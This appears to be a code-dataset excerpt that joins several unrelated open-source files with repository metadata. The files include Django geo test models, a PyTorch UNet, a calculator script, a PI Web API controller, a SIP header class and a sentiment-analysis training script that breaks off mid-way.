# These use the GeoManager but do not have any geographic fields.
class Author(models.Model):
name = models.CharField(max_length=100)
objects = models.GeoManager()
class Article(models.Model):
title = models.CharField(max_length=100)
author = models.ForeignKey(Author, unique=True)
objects = models.GeoManager()
class Book(models.Model):
title = models.CharField(max_length=100)
author = models.ForeignKey(Author, related_name='books', null=True)
objects = models.GeoManager()
| 34.7
| 72
| 0.711816
|
b4df4720f98d8c0313ff7d7fcfc8643adcf99534
| 2,795
|
py
|
Python
|
train/semantic_segmentation/models/unet.py
|
iva-dtis/DISIR
|
0b4c6c41712ab88de982412e80510545cc17dd09
|
[
"MIT"
] | 38
|
2020-02-19T14:23:32.000Z
|
2022-01-21T09:22:40.000Z
|
train/semantic_segmentation/models/unet.py
|
iva-dtis/DISIR
|
0b4c6c41712ab88de982412e80510545cc17dd09
|
[
"MIT"
] | 6
|
2020-02-19T11:14:15.000Z
|
2022-03-12T00:16:25.000Z
|
train/semantic_segmentation/models/unet.py
|
iva-dtis/DISIR
|
0b4c6c41712ab88de982412e80510545cc17dd09
|
[
"MIT"
] | 7
|
2020-04-07T20:07:52.000Z
|
2022-01-26T16:10:09.000Z
|
"""
Source: https://github.com/milesial/Pytorch-UNet
"""
import torch.nn as nn
import torch.nn.functional as F
import torch
class double_conv(nn.Module):
"""(conv => BN => ReLU) * 2"""
def __init__(self, in_ch, out_ch):
super(double_conv, self).__init__()
self.conv = nn.Sequential(
nn.Conv2d(in_ch, out_ch, 3, padding=1),
nn.BatchNorm2d(out_ch),
nn.ReLU(inplace=True),
nn.Conv2d(out_ch, out_ch, 3, padding=1),
nn.BatchNorm2d(out_ch),
nn.ReLU(inplace=True),
)
def forward(self, x):
x = self.conv(x)
return x
class inconv(nn.Module):
def __init__(self, in_ch, out_ch):
super(inconv, self).__init__()
self.conv = double_conv(in_ch, out_ch)
def forward(self, x):
x = self.conv(x)
return x
class down(nn.Module):
def __init__(self, in_ch, out_ch):
super(down, self).__init__()
self.mpconv = nn.Sequential(nn.MaxPool2d(2), double_conv(in_ch, out_ch))
def forward(self, x):
x = self.mpconv(x)
return x
class up(nn.Module):
def __init__(self, in_ch, out_ch, bilinear=True):
super(up, self).__init__()
if bilinear:
self.up = nn.UpsamplingBilinear2d(scale_factor=2)
else:
self.up = nn.ConvTranspose2d(in_ch, out_ch, 2, stride=2)
self.conv = double_conv(in_ch, out_ch)
def forward(self, x1, x2):
x1 = self.up(x1)
diffX = x1.size()[2] - x2.size()[2]
diffY = x1.size()[3] - x2.size()[3]
x2 = F.pad(x2, (diffX // 2, int(diffX / 2), diffY // 2, int(diffY / 2)))
x = torch.cat([x2, x1], dim=1)
x = self.conv(x)
return x
class outconv(nn.Module):
def __init__(self, in_ch, out_ch):
super(outconv, self).__init__()
self.conv = nn.Conv2d(in_ch, out_ch, 1)
def forward(self, x):
x = self.conv(x)
return x
class UNet(nn.Module):
def __init__(self, in_channels, n_classes):
super(UNet, self).__init__()
self.inc = inconv(in_channels + n_classes, 64)
self.down1 = down(64, 128)
self.down2 = down(128, 256)
self.down3 = down(256, 512)
self.down4 = down(512, 512)
self.up1 = up(1024, 256)
self.up2 = up(512, 128)
self.up3 = up(256, 64)
self.up4 = up(128, 64)
self.outc = outconv(64, n_classes)
self.net_name = "UNet"
def forward(self, x):
x1 = self.inc(x)
x2 = self.down1(x1)
x3 = self.down2(x2)
x4 = self.down3(x3)
x5 = self.down4(x4)
x = self.up1(x5, x4)
x = self.up2(x, x3)
x = self.up3(x, x2)
x = self.up4(x, x1)
x = self.outc(x)
return x
| 26.619048
| 80
| 0.549911
|
bf7e61f403f5a2b169aa3343d4074b7755b81f27
| 631
|
py
|
Python
|
0x02-python-import_modules/100-my_calculator.py
|
coding-max/holbertonschool-higher_level_programming
|
392fed1ae686642b6cca6bb6752050882bbf79fc
|
[
"MIT"
] | 1
|
2021-04-26T03:45:12.000Z
|
2021-04-26T03:45:12.000Z
|
0x02-python-import_modules/100-my_calculator.py
|
coding-max/holbertonschool-higher_level_programming
|
392fed1ae686642b6cca6bb6752050882bbf79fc
|
[
"MIT"
] | null | null | null |
0x02-python-import_modules/100-my_calculator.py
|
coding-max/holbertonschool-higher_level_programming
|
392fed1ae686642b6cca6bb6752050882bbf79fc
|
[
"MIT"
] | 1
|
2022-02-02T02:44:35.000Z
|
2022-02-02T02:44:35.000Z
|
#!/usr/bin/python3
if __name__ == "__main__":
from calculator_1 import add, sub, mul, div
import sys
argv = sys.argv
if len(argv) != 4:
print("Usage: ./100-my_calculator.py <a> <operator> <b>")
sys.exit(1)
elif argv[2] == '+':
op = add
elif argv[2] == '-':
op = sub
elif argv[2] == '*':
op = mul
elif argv[2] == '/':
op = div
else:
print("Unknown operator. Available operators: +, -, * and /")
sys.exit(1)
result = op(int(argv[1]), int(argv[3]))
print("{} {} {} = {}".format(int(argv[1]), argv[2], int(argv[3]), result))
| 26.291667
| 78
| 0.494453
|
8ce7be4cb048e76c8125be5adcb766c8da03ae38
| 19,804
|
py
|
Python
|
piwebasync/api/controllers/assetdatabases.py
|
newvicx/piwebasync
|
fc0d159aa4b99667777f428a090fe7a102481fea
|
[
"MIT"
] | null | null | null |
piwebasync/api/controllers/assetdatabases.py
|
newvicx/piwebasync
|
fc0d159aa4b99667777f428a090fe7a102481fea
|
[
"MIT"
] | 2
|
2022-03-02T17:42:21.000Z
|
2022-03-29T19:24:01.000Z
|
piwebasync/api/controllers/assetdatabases.py
|
newvicx/piwebasync
|
fc0d159aa4b99667777f428a090fe7a102481fea
|
[
"MIT"
] | null | null | null |
from datetime import datetime
from typing import List, Tuple, Union
from ...types import APIRequestType, ControllerType, QueryStrType
class AssetDatabases:
"""
https://docs.osisoft.com/bundle/pi-web-api-reference/page/help/controllers/assetdatabase.html
"""
CONTROLLER = "assetdatabases"
def __init__(self, constructor: ControllerType) -> None:
self._constructor = constructor
def get(
self,
webid: str,
selected_fields: Union[List[str], Tuple[str]] = None,
web_id_type: str = None,
) -> APIRequestType:
"""
https://docs.osisoft.com/bundle/pi-web-api-reference/page/help/controllers/assetdatabase/actions/get.html
"""
action = None
return self._constructor._build_request(
method="GET",
protocol="HTTP",
controller=self.CONTROLLER,
action=action,
webid=webid,
selected_fields=selected_fields,
web_id_type=web_id_type
)
def get_by_path(
self,
path: str,
selected_fields: Union[List[str], Tuple[str]] = None,
web_id_type: str = None,
) -> APIRequestType:
"""
https://docs.osisoft.com/bundle/pi-web-api-reference/page/help/controllers/assetdatabase/actions/getbypath.html
"""
action = None
return self._constructor._build_request(
method="GET",
protocol="HTTP",
controller=self.CONTROLLER,
action=action,
path=path,
selected_fields=selected_fields,
web_id_type=web_id_type
)
def find_analyses(
self,
webid: str,
field: str = None,
query: QueryStrType = None,
sort_field: str = None,
start_index: int = None,
sort_order: str = None,
max_count: int = None,
selected_fields: Union[List[str], Tuple[str]] = None,
web_id_type: str = None,
) -> APIRequestType:
"""
https://docs.osisoft.com/bundle/pi-web-api-reference/page/help/controllers/assetdatabase/actions/findanalyses.html
"""
action = "analyses"
return self._constructor._build_request(
method="GET",
protocol="HTTP",
controller=self.CONTROLLER,
action=action,
webid=webid,
field=field,
query=query,
sort_field=sort_field,
sort_order=sort_order,
start_index=start_index,
max_count=max_count,
selected_fields=selected_fields,
web_id_type=web_id_type,
)
def find_element_attributes(
self,
webid: str,
element_name_filter: QueryStrType = None,
element_description_filter: QueryStrType = None,
element_category: str = None,
element_template: str = None,
element_type: str = None,
attribute_name_filter: QueryStrType = None,
attribute_description_filter: QueryStrType = None,
attribute_category: str = None,
attribute_type: str = None,
search_full_hierarchy: bool = None,
sort_field: str = None,
sort_order: str = None,
start_index: int = None,
max_count: int = None,
selected_fields: Union[List[str], Tuple[str]] = None,
web_id_type: str = None,
associations: Union[List[str], Tuple[str]] = None,
) -> APIRequestType:
"""
https://docs.osisoft.com/bundle/pi-web-api-reference/page/help/controllers/assetdatabase/actions/findelementattributes.html
"""
action = "elementattributes"
return self._constructor._build_request(
method="GET",
protocol="HTTP",
controller=self.CONTROLLER,
action=action,
webid=webid,
element_name_filter=element_name_filter,
element_description_filter=element_description_filter,
element_category=element_category,
element_template=element_template,
element_type=element_type,
attribute_name_filter=attribute_name_filter,
attribute_description_filter=attribute_description_filter,
attribute_category=attribute_category,
attribute_type=attribute_type,
search_full_hierarchy=search_full_hierarchy,
sort_field=sort_field,
sort_order=sort_order,
start_index=start_index,
max_count=max_count,
selected_fields=selected_fields,
web_id_type=web_id_type,
associations=associations
)
def find_event_frame_attributes(
self,
webid: str,
search_mode: str = None,
start_time: datetime = None,
end_time: datetime = None,
event_frame_name_filter: QueryStrType = None,
event_frame_description_filter: QueryStrType = None,
referenced_element_name_filter: QueryStrType = None,
event_frame_category: str = None,
event_frame_template: str = None,
attribute_name_filter: QueryStrType = None,
attribute_description_filter: QueryStrType = None,
attribute_category: str = None,
attribute_type: str = None,
search_full_hierarchy: bool = None,
sort_field: str = None,
sort_order: str = None,
start_index: int = None,
max_count: int = None,
selected_fields: Union[List[str], Tuple[str]] = None,
web_id_type: str = None,
associations: Union[List[str], Tuple[str]] = None,
) -> APIRequestType:
"""
https://docs.osisoft.com/bundle/pi-web-api-reference/page/help/controllers/assetdatabase/actions/findeventframeattributes.html
"""
action = "eventframeattributes"
return self._constructor._build_request(
method="GET",
protocol="HTTP",
controller=self.CONTROLLER,
action=action,
webid=webid,
search_mode=search_mode,
start_time=start_time,
end_time=end_time,
event_frame_name_filter=event_frame_name_filter,
event_frame_description_filter=event_frame_description_filter,
referenced_element_name_filter=referenced_element_name_filter,
event_frame_category=event_frame_category,
event_frame_template=event_frame_template,
attribute_name_filter=attribute_name_filter,
attribute_description_filter=attribute_description_filter,
attribute_category=attribute_category,
attribute_type=attribute_type,
search_full_hierarchy=search_full_hierarchy,
sort_field=sort_field,
sort_order=sort_order,
start_index=start_index,
max_count=max_count,
selected_fields=selected_fields,
web_id_type=web_id_type,
associations=associations
)
def get_analysis_categories(
self,
webid: str,
selected_fields: Union[List[str], Tuple[str]] = None,
web_id_type: str = None,
) -> APIRequestType:
"""
https://docs.osisoft.com/bundle/pi-web-api-reference/page/help/controllers/assetdatabase/actions/getanalysiscategories.html
"""
action = "analysiscategories"
return self._constructor._build_request(
method="GET",
protocol="HTTP",
controller=self.CONTROLLER,
action=action,
webid=webid,
selected_fields=selected_fields,
web_id_type=web_id_type
)
def get_analysis_templates(
self,
webid: str,
field: str = None,
query: QueryStrType = None,
sort_field: str = None,
sort_order: str = None,
max_count: int = None,
selected_fields: Union[List[str], Tuple[str]] = None,
web_id_type: str = None,
) -> APIRequestType:
"""
https://docs.osisoft.com/bundle/pi-web-api-reference/page/help/controllers/assetdatabase/actions/getanalysistemplates.html
"""
action = "analysistemplates"
return self._constructor._build_request(
method="GET",
protocol="HTTP",
controller=self.CONTROLLER,
action=action,
webid=webid,
field=field,
query=query,
sort_field=sort_field,
sort_order=sort_order,
max_count=max_count,
selected_fields=selected_fields,
web_id_type=web_id_type,
)
def get_attribute_categories(
self,
webid: str,
selected_fields: Union[List[str], Tuple[str]] = None,
web_id_type: str = None,
) -> APIRequestType:
"""
https://docs.osisoft.com/bundle/pi-web-api-reference/page/help/controllers/assetdatabase/actions/getattributecategories.html
"""
action = "attributecategories"
return self._constructor._build_request(
method="GET",
protocol="HTTP",
controller=self.CONTROLLER,
action=action,
webid=webid,
selected_fields=selected_fields,
web_id_type=web_id_type
)
def get_element_categories(
self,
webid: str,
selected_fields: Union[List[str], Tuple[str]] = None,
web_id_type: str = None,
) -> APIRequestType:
"""
https://docs.osisoft.com/bundle/pi-web-api-reference/page/help/controllers/assetdatabase/actions/getelementcategories.html
"""
action = "elementcategories"
return self._constructor._build_request(
method="GET",
protocol="HTTP",
controller=self.CONTROLLER,
action=action,
webid=webid,
selected_fields=selected_fields,
web_id_type=web_id_type
)
def get_elements(
self,
webid: str,
name_filter: str = None,
description_filter: str = None,
category_name: str = None,
template_name: str = None,
element_type: str = None,
search_full_hierarchy: bool = None,
sort_field: str = None,
sort_order: str = None,
start_index: int = None,
max_count: int = None,
selected_fields: Union[List[str], Tuple[str]] = None,
web_id_type: str = None,
associations: Union[List[str], Tuple[str]] = None
) -> APIRequestType:
"""
https://docs.osisoft.com/bundle/pi-web-api-reference/page/help/controllers/assetdatabase/actions/getelements.html
"""
action ="elements"
return self._constructor._build_request(
method="GET",
protocol="HTTP",
controller=self.CONTROLLER,
action=action,
webid=webid,
name_filter=name_filter,
description_filter=description_filter,
category_name=category_name,
template_name=template_name,
element_type=element_type,
search_full_hierarchy=search_full_hierarchy,
sort_field=sort_field,
sort_order=sort_order,
start_index=start_index,
max_count=max_count,
selected_fields=selected_fields,
web_id_type=web_id_type,
associations=associations
)
def get_element_templates(
self,
webid: str,
field: str = None,
query: QueryStrType = None,
sort_field: str = None,
sort_order: str = None,
max_count: int = None,
selected_fields: Union[List[str], Tuple[str]] = None,
web_id_type: str = None,
) -> APIRequestType:
"""
https://docs.osisoft.com/bundle/pi-web-api-reference/page/help/controllers/assetdatabase/actions/getelementtemplates.html
"""
action = "elementtemplates"
return self._constructor._build_request(
method="GET",
protocol="HTTP",
controller=self.CONTROLLER,
action=action,
webid=webid,
field=field,
query=query,
sort_field=sort_field,
sort_order=sort_order,
max_count=max_count,
selected_fields=selected_fields,
web_id_type=web_id_type,
)
def get_enumeration_sets(
self,
webid: str,
selected_fields: Union[List[str], Tuple[str]] = None,
web_id_type: str = None,
) -> APIRequestType:
"""
https://docs.osisoft.com/bundle/pi-web-api-reference/page/help/controllers/assetdatabase/actions/getenumerationsets.html
"""
action = "enumerationsets"
return self._constructor._build_request(
method="GET",
protocol="HTTP",
controller=self.CONTROLLER,
action=action,
webid=webid,
selected_fields=selected_fields,
web_id_type=web_id_type
)
def get_event_frames(
self,
webid: str,
search_mode: str = None,
start_time: datetime = None,
end_time: datetime = None,
name_filter: QueryStrType = None,
referenced_element_name_filter: QueryStrType = None,
category_name: str = None,
template_name: str = None,
referenced_element_template_name: str = None,
severity: Union[List[str], Tuple[str]] = None,
can_be_acknowledged: str = None,
is_acknowleged: str = None,
search_full_hierarchy: bool = None,
sort_field: str = None,
sort_order: str = None,
start_index: int = None,
max_count: int = None,
selected_fields: Union[List[str], Tuple[str]] = None,
web_id_type: str = None
) -> APIRequestType:
"""
https://docs.osisoft.com/bundle/pi-web-api-reference/page/help/controllers/assetdatabase/actions/geteventframes.html
"""
action = "eventframes"
return self._constructor._build_request(
method="GET",
protocol="HTTP",
controller=self.CONTROLLER,
action=action,
webid=webid,
search_mode=search_mode,
start_time=start_time,
end_time=end_time,
name_filter=name_filter,
referenced_element_name_filter=referenced_element_name_filter,
category_name=category_name,
template_name=template_name,
referenced_element_template_name=referenced_element_template_name,
severity_many=severity,
can_be_acknowledged=can_be_acknowledged,
is_acknowleged=is_acknowleged,
search_full_hierarchy=search_full_hierarchy,
sort_field=sort_field,
sort_order=sort_order,
start_index=start_index,
max_count=max_count,
selected_fields=selected_fields,
web_id_type=web_id_type,
)
def get_referenced_elements(
self,
webid: str,
name_filter: QueryStrType = None,
description_filter: QueryStrType = None,
category_name: str = None,
template_name: str = None,
element_type: str = None,
sort_field: str = None,
sort_order: str = None,
start_index: int = None,
max_count: int = None,
selected_fields: Union[List[str], Tuple[str]] = None,
web_id_type: str = None,
associations: Union[List[str], Tuple[str]] = None
) -> APIRequestType:
"""
https://docs.osisoft.com/bundle/pi-web-api-reference/page/help/controllers/assetdatabase/actions/getreferencedelements.html
"""
action = "referencedelements"
return self._constructor._build_request(
method="GET",
protocol="HTTP",
controller=self.CONTROLLER,
action=action,
webid=webid,
name_filter=name_filter,
description_filter=description_filter,
category_name=category_name,
template_name=template_name,
element_type=element_type,
sort_field=sort_field,
sort_order=sort_order,
start_index=start_index,
max_count=max_count,
selected_fields=selected_fields,
web_id_type=web_id_type,
associations=associations
)
def get_security(
self,
webid: str,
security_item: Union[List[str], Tuple[str]] = None,
user_identity: Union[List[str], Tuple[str]] = None,
force_refresh: bool = None,
selected_fields: Union[List[str], Tuple[str]] = None,
web_id_type: str = None,
) -> APIRequestType:
"""
https://docs.osisoft.com/bundle/pi-web-api-reference/page/help/controllers/assetdatabase/actions/getsecurity.html
"""
action = "security"
return self._constructor._build_request(
method="GET",
protocol="HTTP",
controller=self.CONTROLLER,
action=action,
webid=webid,
security_item_many=security_item,
user_identity_many=user_identity,
force_refresh=force_refresh,
selected_fields=selected_fields,
web_id_type=web_id_type
)
def get_security_entries(
self,
webid: str,
security_item: str = None,
name_filter: QueryStrType = None,
selected_fields: Union[List[str], Tuple[str]] = None,
web_id_type: str = None,
) -> APIRequestType:
"""
https://docs.osisoft.com/bundle/pi-web-api-reference/page/help/controllers/assetdatabase/actions/getsecurityentries.html
"""
action = "securityentries"
return self._constructor._build_request(
method="GET",
protocol="HTTP",
controller=self.CONTROLLER,
action=action,
webid=webid,
security_item=security_item,
name_filter=name_filter,
selected_fields=selected_fields,
web_id_type=web_id_type,
)
def get_security_entry_by_name(
self,
webid: str,
name: str,
security_item: str = None,
selected_fields: Union[List[str], Tuple[str]] = None,
web_id_type: str = None,
) -> APIRequestType:
"""
https://docs.osisoft.com/bundle/pi-web-api-reference/page/help/controllers/assetdatabase/actions/getsecurityentrybyname.html
"""
action = "securityentries"
return self._constructor._build_request(
method="GET",
protocol="HTTP",
controller=self.CONTROLLER,
action=action,
webid=webid,
security_item=security_item,
selected_fields=selected_fields,
web_id_type=web_id_type,
add_path = [name]
)
def get_table_categories(
self,
webid: str,
selected_fields: Union[List[str], Tuple[str]] = None,
web_id_type: str = None,
) -> APIRequestType:
"""
https://docs.osisoft.com/bundle/pi-web-api-reference/page/help/controllers/assetdatabase/actions/gettablecategories.html
"""
action = "tablecategories"
return self._constructor._build_request(
method="GET",
protocol="HTTP",
controller=self.CONTROLLER,
action=action,
webid=webid,
selected_fields=selected_fields,
web_id_type=web_id_type
)
| 33.172529
| 134
| 0.599071
|
4585c96702e4043e4513a02cfc34aeaa2e511ed6
| 1,760
|
py
|
Python
|
sippy/SipRSeq.py
|
jevonearth/b2bua
|
0bbc6f2d62b6473408cea2542b8ef1be38dea814
|
[
"BSD-2-Clause"
] | null | null | null |
sippy/SipRSeq.py
|
jevonearth/b2bua
|
0bbc6f2d62b6473408cea2542b8ef1be38dea814
|
[
"BSD-2-Clause"
] | null | null | null |
sippy/SipRSeq.py
|
jevonearth/b2bua
|
0bbc6f2d62b6473408cea2542b8ef1be38dea814
|
[
"BSD-2-Clause"
] | null | null | null |
# Copyright (c) 2015 Sippy Software, Inc. All rights reserved.
#
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation and/or
# other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
# ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from SipNumericHF import SipNumericHF
class SipRSeq(SipNumericHF):
hf_names = ('rseq',)
def __init__(self, body = None, number = 1):
SipNumericHF.__init__(self, body, number)
def getCanName(self, name, compact = False):
return 'RSeq'
if __name__ == '__main__':
rs = SipRSeq(body = '50')
rs.parse()
print rs.number
rs.number = 100
print str(rs)
| 40.930233
| 82
| 0.753977
|
45d5a8773190ff4585826e2472fa81569d434550
| 15,269
|
py
|
Python
|
src/model_all.py
|
sw1001/ENLP-Project
|
79e1257665a4c3ecc342505061041bed886891b5
|
[
"Apache-2.0"
] | 1
|
2021-12-20T13:39:02.000Z
|
2021-12-20T13:39:02.000Z
|
src/model_all.py
|
sw1001/ENLP-Project
|
79e1257665a4c3ecc342505061041bed886891b5
|
[
"Apache-2.0"
] | null | null | null |
src/model_all.py
|
sw1001/ENLP-Project
|
79e1257665a4c3ecc342505061041bed886891b5
|
[
"Apache-2.0"
] | 2
|
2018-04-02T02:41:04.000Z
|
2018-04-04T16:36:40.000Z
|
import logging
import re
import time
import warnings
import nltk.data
import numpy as np
import pandas as pd
import sklearn
from bs4 import BeautifulSoup
from gensim.models import KeyedVectors, word2vec
from nltk.corpus import stopwords
from sklearn import metrics
from sklearn import naive_bayes, svm, preprocessing
from sklearn.decomposition import TruncatedSVD
from sklearn.ensemble import RandomForestClassifier
from sklearn.feature_extraction.text import CountVectorizer, TfidfVectorizer
from sklearn.feature_selection.univariate_selection import chi2, SelectKBest
from sklearn.metrics import classification_report
from sklearn.model_selection import GridSearchCV
from sklearn.model_selection import cross_val_score
# #################### Initialization #####################
current_time = time.time()
warnings.simplefilter("ignore", UserWarning)
warnings.simplefilter("ignore", FutureWarning)
write_to_csv = False
# term_vector_type = {"TFIDF", "Binary", "Int", "Word2vec", "Word2vec_pretrained"}
# {"TFIDF", "Int", "Binary"}: Bag-of-words model with {tf-idf, word counts, presence/absence} representation
# {"Word2vec", "Word2vec_pretrained"}: Google word2vec representation {without, with} pre-trained models
# Specify model_name if there's a pre-trained model to be loaded
vector_type = "TFIDF"
model_name = "../data/GoogleNews-vectors-negative300.bin"
# model_type = {"bin", "reg"}
# Specify whether pre-trained word2vec model is binary
model_type = "bin"
# Parameters for word2vec
# num_features need to be identical with the pre-trained model
num_features = 300 # Word vector dimensionality
min_word_count = 40 # Minimum word count to be included for training
num_workers = 4 # Number of threads to run in parallel
context = 10 # Context window size
downsampling = 1e-3 # Downsample setting for frequent words
# training_model = {"RF", "NB", "SVM", "BT", "no"}
training_model = "RF"
# feature scaling = {"standard", "signed", "unsigned", "no"}
# Note: Scaling is needed for SVM
scaling = "no"
# dimension reduction = {"SVD", "chi2", "no"}
# Note: For NB models, we cannot perform truncated SVD as it will make input negative
# chi2 is the feature selection based on chi2 independence test
# https://nlp.stanford.edu/IR-book/html/htmledition/feature-selectionchi2-feature-selection-1.html
dim_reduce = "chi2"
num_dim = 500
# #################### End of Initialization #####################
# #################### Function Definition #####################
def clean_review(raw_review, remove_stopwords=False, output_format="string"):
"""
Input:
raw_review: raw text of a movie review
remove_stopwords: a boolean variable to indicate whether to remove stop words
output_format: if "string", return a cleaned string
if "list", a list of words extracted from cleaned string.
Output:
Cleaned string or list.
"""
# Remove HTML markup
text = BeautifulSoup(raw_review)
# Keep only characters
text = re.sub("[^a-zA-Z]", " ", text.get_text())
# Split words and store to list
text = text.lower().split()
if remove_stopwords:
# Use set as it has O(1) lookup time
stops = set(stopwords.words("english"))
words = [w for w in text if w not in stops]
else:
words = text
# Return a cleaned string or list
if output_format == "string":
return " ".join(words)
elif output_format == "list":
return words
def review_to_doublelist(review, tokenizer, remove_stopwords=False):
"""
Function which generates a list of lists of words from a review for word2vec uses.
Input:
review: raw text of a movie review
tokenizer: tokenizer for sentence parsing
nltk.data.load('tokenizers/punkt/english.pickle')
remove_stopwords: a boolean variable to indicate whether to remove stop words
Output:
A list of lists.
The outer list consists of all sentences in a review.
The inner list consists of all words in a sentence.
"""
# Create a list of sentences
raw_sentences = tokenizer.tokenize(review.strip())
sentence_list = []
for raw_sentence in raw_sentences:
if len(raw_sentence) > 0:
sentence_list.append(clean_review(raw_sentence, False, "list"))
return sentence_list
def review_to_vec(words, model, num_features):
"""
Function which generates a feature vector for the given review.
Input:
words: a list of words extracted from a review
model: trained word2vec model
num_features: dimension of word2vec vectors
Output:
a numpy array representing the review
"""
feature_vec = np.zeros((num_features), dtype="float32")
word_count = 0
# index2word is a list consisting of all words in the vocabulary
# Convert list to set for speed
index2word_set = set(model.index2word)
for word in words:
if word in index2word_set:
word_count += 1
feature_vec += model[word]
feature_vec /= word_count
return feature_vec
def gen_review_vecs(reviews, model, num_features):
"""
Function which generates a m-by-n numpy array from all reviews,
where m is len(reviews), and n is num_feature
Input:
reviews: a list of lists.
Inner lists are words from each review.
Outer lists consist of all reviews
model: trained word2vec model
num_feature: dimension of word2vec vectors
Output: m-by-n numpy array, where m is len(review) and n is num_feature
"""
curr_index = 0
review_feature_vecs = np.zeros((len(reviews), num_features), dtype="float32")
for review in reviews:
if curr_index % 1000 == 0.:
print("Vectorizing review %d of %d" % (curr_index, len(reviews)))
review_feature_vecs[curr_index] = review_to_vec(review, model, num_features)
curr_index += 1
return review_feature_vecs
# #################### End of Function Definition #####################
# ########################## Main Program ###########################
test_size = 0.2
train_list = []
test_list = []
word2vec_input = []
pred = []
cols = ['PhraseId', 'SentenceId', 'Phrase']
target_names = ['0', '1', '2']
train_data = pd.read_csv("../data/train_mapped.tsv", header=0, delimiter="\t", quoting=0)
test_data = pd.read_csv("../data/test.tsv", header=0, delimiter="\t", quoting=0)
train_data, test_data, train_data_y, test_data_y = sklearn.model_selection.train_test_split(train_data[cols],
train_data['Sentiment'],
test_size=test_size,
random_state=19960214)
train_data = train_data.reset_index()
train_data = train_data.drop(['index'], axis=1)
test_data = test_data.reset_index()
test_data = test_data.drop(['index'], axis=1)
if vector_type == "Word2vec":
unlab_train_data = pd.read_csv("../data/train_extract.tsv", header=0, delimiter="\t", quoting=3)
tokenizer = nltk.data.load('tokenizers/punkt/english.pickle')
logging.basicConfig(format='%(asctime)s: %(message)s', level=logging.INFO)
# Extract words from reviews
print('Start Extract Words from Reviews...')
# xrange is faster when iterating
if vector_type == "Word2vec" or vector_type == "Word2vec_pretrained":
for i in range(0, len(train_data.Phrase)):
if vector_type == "Word2vec":
# Decode utf-8 coding first
word2vec_input.extend(review_to_doublelist(train_data.Phrase[i], tokenizer))
train_list.append(clean_review(train_data.Phrase[i], output_format="list"))
if i % 1000 == 0:
print("Cleaning training review", i)
if vector_type == "Word2vec":
for i in range(0, len(unlab_train_data.Phrase)):
word2vec_input.extend(review_to_doublelist(unlab_train_data.Phrase[i], tokenizer))
if i % 1000 == 0:
print("Cleaning unlabeled training review", i)
for i in range(0, len(test_data.Phrase)):
test_list.append(clean_review(test_data.Phrase[i], output_format="list"))
if i % 1000 == 0:
print("Cleaning test review", i)
elif vector_type != "no":
for i in range(0, len(train_data.Phrase)):
# Append raw texts rather than lists as Count/TFIDF vectorizers take raw texts as inputs
train_list.append(clean_review(train_data.Phrase[i]))
if i % 1000 == 0:
print("Cleaning training review", i)
for i in range(0, len(test_data.Phrase)):
# Append raw texts rather than lists as Count/TFIDF vectorizers take raw texts as inputs
test_list.append(clean_review(test_data.Phrase[i]))
if i % 1000 == 0:
print("Cleaning test review", i)
# Generate vectors from words
if vector_type == "Word2vec_pretrained" or vector_type == "Word2vec":
if vector_type == "Word2vec_pretrained":
print("Loading the pre-trained model")
if model_type == "bin":
model = KeyedVectors.load_word2vec_format(model_name, binary=True)
else:
model = KeyedVectors.load(model_name)
if vector_type == "Word2vec":
print("Training word2vec word vectors")
model = word2vec.Word2Vec(word2vec_input, workers=num_workers,
size=num_features, min_count=min_word_count,
window=context, sample=downsampling)
# If no further training and only query is needed, this trims unnecessary memory
model.init_sims(replace=True)
# Save the model for later use
model.save(model_name)
print("Vectorizing training review")
train_vec = gen_review_vecs(train_list, model, num_features)
print("Vectorizing test review")
test_vec = gen_review_vecs(test_list, model, num_features)
elif vector_type != "no":
if vector_type == "TFIDF":
# Unit of gram is "word", only top 5000/10000 words are extracted
count_vec = TfidfVectorizer(analyzer="word", ngram_range=(1, 2), sublinear_tf=True)
elif vector_type == "Binary" or vector_type == "Int":
count_vec = CountVectorizer(analyzer="word", binary=(vector_type == "Binary"),
ngram_range=(1, 2))
# Return a scipy sparse term-document matrix
print("Vectorizing input texts")
train_vec = count_vec.fit_transform(train_list)
test_vec = count_vec.transform(test_list)
# Dimension Reduction
print("Start Dimension Reduction...")
if dim_reduce == "SVD":
print("Performing dimension reduction")
svd = TruncatedSVD(n_components=num_dim)
train_vec = svd.fit_transform(train_vec)
test_vec = svd.transform(test_vec)
print("Explained variance ratio =", svd.explained_variance_ratio_.sum())
elif dim_reduce == "chi2":
print("Performing feature selection based on chi2 independence test")
fselect = SelectKBest(chi2, k=num_dim)
train_vec = fselect.fit_transform(train_vec, train_data_y)
test_vec = fselect.transform(test_vec)
# Transform into numpy arrays
if "numpy.ndarray" not in str(type(train_vec)):
train_vec = train_vec.toarray()
test_vec = test_vec.toarray()
# Feature Scaling
if scaling != "no":
if scaling == "standard":
scaler = preprocessing.StandardScaler()
else:
if scaling == "unsigned":
scaler = preprocessing.MinMaxScaler(feature_range=(0, 1))
elif scaling == "signed":
scaler = preprocessing.MinMaxScaler(feature_range=(-1, 1))
print("Scaling vectors")
train_vec = scaler.fit_transform(train_vec)
test_vec = scaler.transform(test_vec)
# Model training
print('Start Training...It takes a long time...')
if training_model == "RF" or training_model == "BT":
# Initialize the Random Forest or bagged tree based the model chosen
rfc = RandomForestClassifier(n_estimators=100, oob_score=True,
max_features=(None if training_model == "BT" else "auto"))
